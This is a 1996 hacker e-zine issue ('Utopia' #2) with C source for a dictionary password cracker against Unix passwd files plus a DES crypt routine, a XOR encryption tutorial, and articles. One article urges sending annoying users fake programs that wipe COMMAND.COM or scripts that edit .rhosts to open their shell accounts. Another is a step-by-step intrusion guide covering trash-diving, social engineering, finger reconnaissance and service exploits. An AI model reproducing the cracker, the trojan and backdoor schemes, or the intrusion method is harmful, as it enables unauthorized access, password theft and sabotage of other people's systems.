| | ------- ___ |--\ ----- /---\
| | | / \ | | | | |
| | | | | |--/ | |-----|
| | | | | | | | |
\___/ | \___/ | ----- | |
April 1996
PUBLISHED BY: Utopium
Utopia (yoo-to-pi-a), noun 1. an imaginary island described as the place of
perfect moral and social conditions. 2. any place of perfection. 3. any
visionary plan for a perfect system of living.
Disclaimer:
Everything within this publication is purely for informational purposes.
By reading this you take sole responsibility for any consequences. I or any
place that stores this publication take no responsibility for any actions.
All information here is subject to and protected by the First Amendment of the
Constitution of the United States. There is no guarantee on any information in
here. If you feel that any information here may be offensive or illegal within
your country then stop reading now.
Part 1 . . . . . . . . . . . . . . Introduction
Part 2 . . . . . . . . . . . . . . Source Code To A Simple Password Cracker
Part 3 . . . . . . . . . . . . . . Hackers In Reality
Part 4 . . . . . . . . . . . . . . XOR Encryption By Example
Part 5 . . . . . . . . . . . . . . So You Got A Lamer On Your Back
Part 6 . . . . . . . . . . . . . . Information Gathering
+ ------------ +
| Introduction |
+ ------------ +
By Utopium
Issue two is finally here and a lot has changed since. My hard drive got
screwd and I lost a bunch of files and I am a little bored since I've been
reading a bunch of tech manuals and books lately. The world is pretty much the
same though and I'm not much caring about the latest developments going on in
computers right now. Anyway, just plain old life as usual.
Right now I got myself into an interest of encryption and have been
getting source code and information on the subject. I even have a small
article here on XOR encryption if you are interested. I found that
ripem.msu.edu has a great deal of files on encryption so feel free to check it
out for yourself.
One thing that I am amazed at is mathematical bugs that keep popping up
in software I use. The latest one I found was in QBASIC which comes with
MS-DOS and it's a simple problem with addition. Run this line of code:
PRINT 3.26 + 3.25 + 2.55
And you get the result 9.059999. I find this a bit funny that the guys at
Microsoft have this error in something as simple as addition. Makes you hope
that they don't sell software to NASA to pilot the space shuttle. But I figure
that nothing is perfect and you can never get all the bugs out of everything.
At least it keeps us hackers busy.
Enough with the boring talk now so read on and enjoy issue 2 of Utopia. If
you want to submit any articles, information, or letters I can publish, mail me
at utopium@cyberspace.org and you can find copies of Utopia at ftp.fc.net under
/pub/defcon/UTOPIA if you want to look for other issues. I'd appreciate any
contributions as I really don't have the time to write this whole thing so if
anyone out there wants to help me keep this publication going please send in
those articles.
############################################
# Source Code To A Simple Password Cracker #
############################################
In the past you have probably just been slapping those passwd files into
Cracker Jack or some other password cracker and not really bothered to wonder
how they work. Well for those of you who are interested, I have some simple
source code you can look at here to understand how they work. I'm assuming
that you have some basic understanding of the C language so you can read this
without a problem. I also included a version of crypt(3) that works in every
compiler I tried it in so you shouldn't have much of a problem porting this
program to any platform you want. This might even run in Windows if you had a
C compiler for it :). I recommend though that you get ufc-crypt though cause
it's a lot faster and efficient. Tinker around though and maybe you can really
build a high quality program for yourself.
--BEGIN CRACK.C--
#include
#include
#define fetch(a,b,c,d) { fgets(a,130,b); c=strtok(a,":"); d=strtok('\0',":"); }
main(){
FILE *p,*o,*w;
char i[50];
char pes[130],pas[50],pps[50],pws[50];
char *es=pes,*as=pas,*ps=pps,*ws=pws;
printf("Password File: ");
gets(i);
p=fopen(i,"r");
printf("WordList File: ");
gets(i);
w=fopen(i,"r");
printf("Results File : ");
gets(i);
o=fopen(i,"w");
fprintf(o,"*** PASS 1: NULL PASSWORDS ***\n");
while(ps){
fetch(es,p,as,ps);
if(ps) if(ps[-1]==':')
fprintf(o,"| User [%s] has no password!\n",as);
}
fflush(o);
rewind(p);
fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n");
do {
fetch(es,p,as,ps);
if(ps) if(!strcmp((char *)crypt(as,ps),ps))
fprintf(o,"| User [%s] has password [%s]\n",as,as);
}
while(ps);
fflush(o);
rewind(p);
fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n");
do{
rewind(w);
fetch(es,p,as,ps);
do{
fgets(ws,130,w);
ws[strlen(ws)-1]=0;
if(!strcmp((char *)crypt(ws,ps),ps)){
fprintf(o,"| User [%s] has password [%s]\n",as,ws);
fflush(o);
break;
}
}
while(!feof(w));
}
while(!feof(p));
fprintf(o,"*** FINISHED SESSION ***\n");
exit(1) ;
}
--END CRACK.C--
--BEGIN CRYPT.C--
#include
/*
* asc_bin_conv() macro translates a ascii character to
* a 6-bit binary number. Used to translate salts.
*/
#define asc_bin_conv(x) x >= 'a' ? x - 59 : (x >= 'A' ? x - 53 : x - 46 )
/* output_conv[] table is used for the reverse translation */
const char output_conv[] =
"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
/*
* These tables are a part of the original DES specification
*/
/* Key permutation PC1 */
const unsigned char PC1[56] =
{ 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4};
/* Key schedule of left shifts LS */
const unsigned char LS[16] =
{ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1};
/* Key permutation PC2 */
const unsigned char PC2[56] =
{ 14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10,
23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48,
44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32};
/* Bit selection table E */
const unsigned char SE[48] =
{ 32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1};
/* Permutation P */
const unsigned char P[32] =
{ 16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25};
/* Selection functions ('S-boxes') */
const unsigned char S[8][4][16] =
{ { { 14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7 },
{ 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8 },
{ 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0 },
{ 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13 } },
{ { 15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10 },
{ 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5 },
{ 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15 },
{ 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9 } },
{ { 10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8 },
{ 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1 },
{ 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7 },
{ 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12 } },
{ { 7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15 },
{ 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9 },
{ 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4 },
{ 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14 } },
{ { 2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9 },
{ 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6 },
{ 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14 },
{ 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3 } },
{ { 12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11 },
{ 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8 },
{ 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6 },
{ 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13 } },
{ { 4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1 },
{ 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6 },
{ 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2 },
{ 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12 } },
{ { 13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7 },
{ 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2 },
{ 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8 },
{ 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11 } }
};
/* Final permutation IP^-1 */
const unsigned char FP[64] =
{ 40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25};
/* 64-bit bitvector type */
typedef unsigned char vec64[64];
/* return buffer */
static char crypt_return[16];
/* interfaced as the UNIX crypt() */
char *crypt (char *pw, char *salt)
{
int i,j,s,t,cs,l,sb,p1,p2;
char *ret;
vec64 B,K,T,T2;
unsigned char KP[16][48];
unsigned char E[48];
/* Convert pw into a bitvector */
memset (K, 0, 64);
for( i = 0; (i < 64) && (*pw != '\0'); pw++ )
{
K[i++] = (*pw >> 6) & 1;
K[i++] = (*pw >> 5) & 1;
K[i++] = (*pw >> 4) & 1;
K[i++] = (*pw >> 3) & 1;
K[i++] = (*pw >> 2) & 1;
K[i++] = (*pw >> 1) & 1;
K[i++] = *pw & 1;
i++;
}
/*
* combine PC1, LS and PC2 - tables into one for key generation
* KP[i][j] is used to generate the iteration key K_i
*/
cs = 0;
for (i = 0; i < 16; i++)
{
cs += LS[i];
for (j = 0; j < 48; j++)
{
l = PC2[j] - 1;
l = (l < 28) ? (l+cs) % 28 : (l+cs) % 28 + 28;
KP[i][j] = PC1[l]-1;
}
}
/* copy salt to the beginning of the return buffer */
ret = crypt_return;
*ret++ = salt[0];
*ret++ = salt[1];
/*
* permutate the E table according to the saltvalue
* this is the only actual change in the DES algorithm!
*/
s = ((asc_bin_conv(salt[1])) << 6) | (asc_bin_conv(salt[0]));
memcpy(E, SE, 48);
for( i = 0; i < 12; i++)
if( (s >> i) & 1 != 0)
{
t = E[i];
E[i] = E[i+24];
E[i+24] = t;
}
memset (T, 0, 64); /* all zero : no need for IP */
for (cs = 0; cs < 25; cs++) /* DES is called 25 times */
for (i = 0; i < 16; i++) /* 16 DES iterations */
{
/* do PC1-LS-PC2 key-shuffle and xor with the E-expanded left side */
for (j = 0; j < 48; j++)
B[j] = T[E[j]+31] ^ K[KP[i][j]];
/* do sbox - substitution*/
p1 = 0;
p2 = 3;
for (j = 0; j < 8; j++)
{
sb = S[j][(B[p1] << 1) | B[p1+5]]
[(B[1+p1] << 3) | (B[2+p1] << 2) | (B[3+p1] << 1) | B[4+p1]];
for (l = 0; l < 4; l++)
T2[p2-l] = (sb >> l) & 1;
p1 += 6;
p2 += 4;
}
/* permutation P and xor with the right side */
for (j = 0; j < 32; j++)
T[j] ^= T2[P[j]-1];
/* swap the halves (not in the last iteration!) */
if (i != 15)
for (j = 0; j < 32; j++)
{
l = T[j];
T[j] = T[j+32];
T[j+32] = l;
}
}
/* final permutation IP^-1 */
memcpy(T2, T, 64);
for(i = 0; i < 64; i++)
T[i] = T2[FP[i]-1];
/* Output conversion */
for (i = 0; i < 60; i += 6 )
*ret++ = output_conv[ T[i] << 5 | T[i+1] << 4 | T[i+2] << 3 |
T[i+3] << 2 | T[i+4] << 1 | T[i+5] ];
/* the last character has only 4 bits */
*ret++ = output_conv[T[60] << 5 | T[61] << 4 | T[62] << 3 | T[63] << 2];
/* return */
*ret++ = '\0';
return crypt_return;
}
--END CRYPT.C--
(*)(*)(*)(*)(*)(*)(*)(*)
(*)Hackers in Reality(*)
(*)(*)(*)(*)(*)(*)(*)(*)
[By Utopium]
The Mentor probably gave one of the best descriptions of hackers when he
wrote the Hacker Manifesto, unfortunately some people are not taking it
seriously and there is a lot of confusion and craziness about hackers today. I
thought I would write something about this because I am sick of all the stupid
things being said about hackers and want some people to understand.
Any of you out there that don't know anything about hackers and are
somehow reading this, my guess is that you see us as criminals who transfer
money from banks and steal top secret information from military sites. Sorry
to say but we are not criminal like that. Those things are what spies and bank
robbers do. If you hear something on the news about a hacker doing these
things or some other malicious acts, thats just the media and law enforcement
officials making the image.
For those who are not technically smart, or lamers, I just want you to
stop calling yourselves hackers because you are making things worse. Many of
you roam around America Online and use AOHell and programs like it and
claiming that you are elite because you talk cool and run lots of macros. You
fill newsgroups with bogus and often pathetic comments and information. You
even now get search engines like Yahoo! to have your own section where people
think you are real hackers because you have lots of graphics and anarchy
files. Lamers like you are what cause the rest of the world to think that we
are immature, evil, and even criminal. You all need to stop what your doing
and become real hackers if you want to call yourself one.
What the hell do I define a hacker as? Overall I think of a hacker as
someone who wants to learn how computers and networks operate. We use our
skills in accessing systems to further our knowledge and understanding. We
don't mean any real harm to anyone and even would like to help others with our
knowledge. Hacking is a lifestyle which you are only judged by your mind and
not what type of person you are and where you are from.
Honestly I know some things may sound pretty stupid in this article but I
just have to get this out because the world today is making me sick on how
they view and treat hackers. Writing this won't change the world but hopefully
it will influence a few people on what reality is.
* * * * * * * * * * * * * * *
* XOR Encryption By Example *
* * * * * * * * * * * * * * *
* By: Utopium *
* * * * * * * *
For those of you who are still somewhat new to computers you probably
have never heard of XOR. The Exclusive OR system was first used in assembly
language for bit manipulation but has now been made to work in many
programming languages. What XOR does is compare to numbers in binary form and
returns a new number based on the results of the first two numbers. Any bits
in the same position with the same value are set to 0 while any that have
different values are set to 1. Here's an example of how it works:
00000101 (5) XOR 00000110 (6) = 00000011 (3)
You can see this is pretty simple and can be done on paper if you wanted
to do it that way. XORing 5 with 6 brings the result of 3 since the third bit
of each both have the same value while the first and second have unequal
values. I could go into more detail about bit manipulation but that should be
left for when you want to get deeper into programming.
You should see how encryption works into this by now. By comparing one
number to a certain key value you can obscure it by this until you run this
again to decrypt the data. There is no need to make separate encryption and
decryption functions as XORing using the same key value on the encrypted data
will return it to it's original form. You can try this yourself by taking the
example and XORing 3 by 6 to find that the result will be 5. This can make
things pretty convenient.
Now to be honest with you, this encryption is very insecure and anyone
can make a simple program that will break it in minutes so you don't want to
use this to encrypt confidential or personal information. So why would you use
this? Well when you encrypt certain data within a program like a cheat code in
a game or a password it makes it a lot tougher to crack since you can't just
simply crack a whole executable file. Lots of shareware authors use this for
the registration codes they have and virus writers can evade virus scanners
better by encrypting certain instruction code. Using this you can make sure no
one can easily see data you don't want them to see in your programs.
I made a little program in BASIC which does simple encryption on a text
file by taking a password and modifying the number value of it to something
that can be used in this simple program. Here's the source:
LINE INPUT "Input File: ", inf$
LINE INPUT "Output File: ", outf$
LINE INPUT "Password: ", passwd$
OPEN inf$ FOR INPUT AS #1
OPEN outf$ FOR OUTPUT AS #2
FOR n = 1 TO LEN(passwd$)
pn = pn + ASC(MID$(passwd$, n, 1))
NEXT n
WHILE pn > 255
pn = INT(pn / 2)
WEND
WHILE NOT EOF(1)
bscd$ = INPUT$(1, 1)
PRINT #2, CHR$(ASC(bscd$) XOR pn);
WEND
CLOSE
As you can see this is pretty simple and small so it shouldn't be hard to
implement into whatever you want. This uses an 8-bit key but if you want
something a little more secure you can have a 16 or 32-bit key and encrypt
data in blocks of the same size as the key. Encrypting multiple times using
different keys each time can also bring a little more security if needed.
Using this method of encryption on your programs can be very helpful for
any situation. This is just a small example of encryption which you can make
probably as powerful as the DES or IDEA methods. Experiment with this a little
and you should be able to add that little feature you just needed on your
programs.
=================================
So You Got A Lamer On Your Back
=================================
Don't you just hate it when you have some idiot on your back who keeps
bothering you? You just get real annoyed and start flaming him and he flames
you back for stupid reasons and he seems to just make you want to go nuts.
Well don't get too angry, because there are better ways to rid of the pest.
For those really annoying lamers who go "Can someone send me a program to
change my grades?" or "Send me k-rad warez so I can hack the Pentagon and be
31337!" you should stop and think for a minute. If you want them to leave you
alone, give them what they want. Obviously there are no such programs to do
these things, all you really got to do is make it look like it does something
while it really just screws them over. Something that kills their COMMAND.COM
or something else should cut them off for a while as they complain to someone
else or try and actually learn how to use a computer. Once you slapped this
together just send it off with a little friendly note on how to use the
program and you shouldn't have to worry about them.
Lamers on IRC can be the worst as they may have some bots that go crazy
and think they are powerful because their nick has alternating upper and lower
case letters. Some seem to actually know enough to be on a shell account and
use a simple IRC client, but they don't know much more than that. If they were
to ask you for a bot or some other script they could use, be nice and DCC one
over. Make sure that you have a ready made script which when they run, will
modify their .rhosts file to instantly let you in their shell. Now you can
have fun doing whatever you feel in their shell.
One thing strange is that lamers like to collect information which can
actually be of some use. You may be in need of this but they say that they
need something big in exchange. Just as before, give them what they want. Act
pleasant and give them bogus data saying is information on military sites. A
number of people can be fooled by the simple output of a netstat or some other
information service. If it's enough beyond their understanding they will
probably fall for it and send that info you needed.
You don't need to talk harshly or annoy a lamer back in order to be rid
of their presence, a kinder approach can be the best. Using this guise can
help greatly in taking care of your problems. Just have a little imagination
and you should come up with a number of ideas to keep a peaceful hacker life.
/-----------------------\
| INFORMATION GATHERING |
\-----------------------/
\ BY: UTOPIUM /
\_____________/
You know I get real annoyed when I see a post by someone asking to get
a program to hack any computer they want or want someone to teach them to hack
within a few hours. If your one of those people you better read this or one of
the things in the previous article may happen to you.
When you want to hack a system, you first need to find out your dealing
with. Say it's some internet provider which gets on your nerves or a company
which has some things in their drives that interest you. Whatever it is you
must be able to understand the system in order to use it.
If the place is nearby you'll want to go there and scout around. Hang
around the building and see what you can see at desks or other places. Trashing
is something that will help out a lot. Finding documents on certain ways of
accessing their network and info on what kind of operating system is run are
the most crucial thing. Also find information about what they do and anything
like that. If you want to get even more information, do a little social
engineering from phone numbers you found trashing and also do mail requests for
information if they make it freely available.
Once you have all this, you'll want to do some information searching on
the computer to learn more about the actual software and protocols. The WHOIS
service can easily give some data like other sites, names, and e-mail addresses
of superusers. Use finger extensively by first doing something like finger
@host.com and then fingering root, sysadm, and any other users you know of as
to obtain information of what a password could possibly or a phone number a
user may place in their .plan file which can be used for social engineering.
Since the web is also expanding to include almost anything imaginable, check
out the sites web pages and learn more about how they are organized and such.
Now that you have gathered data on the types of operating systems and
networks, a little research is in order. If you don't know about the systems
they use find any documentation you can get your hands on. But if you already
know a good deal, it's still a good idea to brush up as to not make any
mistakes.
With all this knowledge in your head, it's time to break in. There are
various methods for this such as simply guessing passwords or using a bug in a
certain service they have like sendmail. After successfully breaching their
security in this method, you can freely explore and hack your way into higher
levels of access.
All you need to know when doing all of this is that you need to obtain
as much information as you can on your goal. With a little dedication and
creativity, you should be ale to breach almost any system of your choosing.
What I described here is only an example of the many ways to successfully hack
a computer system.